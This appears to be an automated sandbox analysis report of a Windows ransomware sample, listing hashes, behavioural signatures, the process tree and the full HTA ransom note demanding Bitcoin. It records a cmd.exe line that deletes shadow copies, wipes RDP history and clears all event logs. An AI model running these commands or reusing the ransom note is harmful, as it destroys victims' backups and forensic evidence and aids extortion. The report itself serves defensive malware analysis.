Analysis

  • max time kernel
    162s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/08/2023, 18:13

General

  • Target

    Vicebghcfggghc4_browsingExe.exe

  • Size

    149KB

  • MD5

    7328af3a365df9561a55e86421fb81c0

  • SHA1

    6cfb5b4a68100678d95270e3d188572a30abd568

  • SHA256

    4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41

  • SHA512

    d36bc6ff51047aecacbafd92af6581e766d9b38720c5d9443f96a58e213c33a50291d578b18dc77f9b6977eaae712764aa0b49da82c0a9e3fb264e93b0033369

  • SSDEEP

    3072:kudyVkuftDR6PhpKHxf09vLOn8LlB9MJ:kyVzpKHxfkv1l

Score
10/10

Malware Config

Extracted

Path

C:\Read Me.Hta

Ransom Note
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>[email protected]</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language="JScript"> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type="text/css"> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #EDEDED; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </hta:application></p> <div class="header"><img src="data:image/png;base64,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" /> <h2><span style="text-decoration: underline; color: #000000;"><strong><em>All your files have been encrypted!</em></strong></span></h2> </div> <div class="bold">All your files have been encrypted due to a security problem with your PC.</div> <div class="bold">If you want to restore them, write us to the e-mails:&nbsp;<span style="color: #800000;"><a style="color: #800000;" href="mailto:[email protected]">[email protected]</a></span>&nbsp;and&nbsp;<span style="color: #ff0000;"><a style="color: #0000ff;" href="mailto:[email protected]">[email protected] </a></span>&nbsp;and&nbsp;<span style="color: 
#800000;"><a style="color: #006400;" href="mailto:[email protected]">[email protected]</a></span><span style="text-decoration: underline;"></span></div> <p>(for the fastest possible response, write to all 3 mails at once!)</p> <h4 class="bold"><span style="text-decoration: underline;"><em><strong>Write this ID at the beginning of your message:</strong></em></span></h4> <p><span style="text-decoration: underline; color: #0000ff;"><em><strong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strong></em></span></p> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 5Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>
Emails

  • [email protected] (HTA page title)
  • [email protected] (mailto link)
  • [email protected] (mailto link)
  • [email protected] (mailto link)

URLs

  • http://www.w3.org/TR/html4/strict.dtd

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (4006) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vicebghcfggghc4_browsingExe.exe
    "C:\Users\Admin\AppData\Local\Temp\Vicebghcfggghc4_browsingExe.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3684
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3844

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Read Me.Hta

    Filesize

    7KB

    MD5

    c328a20f8b635cc711dd75a64303719e

    SHA1

    01651e52a66f8c3212dbf1085d754a8aaaaa4c51

    SHA256

    fd5c95209d5ad6c6cc192308c440bbe9b92fc32d3d507666bca0a7a2f4b1673c

    SHA512

    dd7d4a3c2ef9600c060249f6ab351db91d9ba847994f28145f067d72d91919ca10b51487699af7a99c5e7087b4cbf46c101b06bdb45e1c31141118dc4c076b1d

  • memory/1676-1992-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-2051-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-8560-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-8598-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-9739-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-10658-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-12050-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-14529-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/1676-14972-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB